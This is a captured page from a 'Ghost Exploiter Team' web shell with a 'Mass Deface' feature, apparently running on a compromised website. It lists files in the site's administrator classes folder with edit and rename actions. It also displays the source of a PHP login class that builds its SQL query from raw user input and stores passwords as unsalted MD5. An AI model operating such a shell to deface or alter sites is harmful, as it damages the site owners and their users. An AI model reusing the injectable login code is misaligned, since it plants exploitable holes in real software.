Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home2
/
ajwaeing
/
public_html
/
administrator
/
classes
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
class.html.mime.mail.inc
11.444KB
edt
ren
dbConnection.php
1.069KB
edt
ren
login.cls.php
0.822KB
edt
ren
messages.cls.php
0.653KB
edt
ren
<?php require_once "dbConnection.php"; class login { function checkLogin($values) { $db = new dbConnection(); $user = $values["user"]; $pwd = $values["pwd"]; $pwd = md5($pwd); if(!empty($user) || !empty($pwd)) { $qry = "SELECT * FROM adminusers WHERE uname='$user' and upassword='$pwd' AND utype=1 AND ustatus=1"; //echo $qry; exit; $res = $db -> query($qry); $num = $db -> rows($res); if($num > 0) { $row = $db -> fetch($res); $userID = $row["ID"]; $userName = $row["uname"]; $_SESSION["UserID"]=$userID; $_SESSION["AdminName"]=$userName; $_SESSION["lock"] = 0; header('location:index.php'); exit; } else { header('location:login.php?msg=invalid'); exit; } } else { header('location:login.php?msg=required'); exit; } } } ?>
<=Back
Liking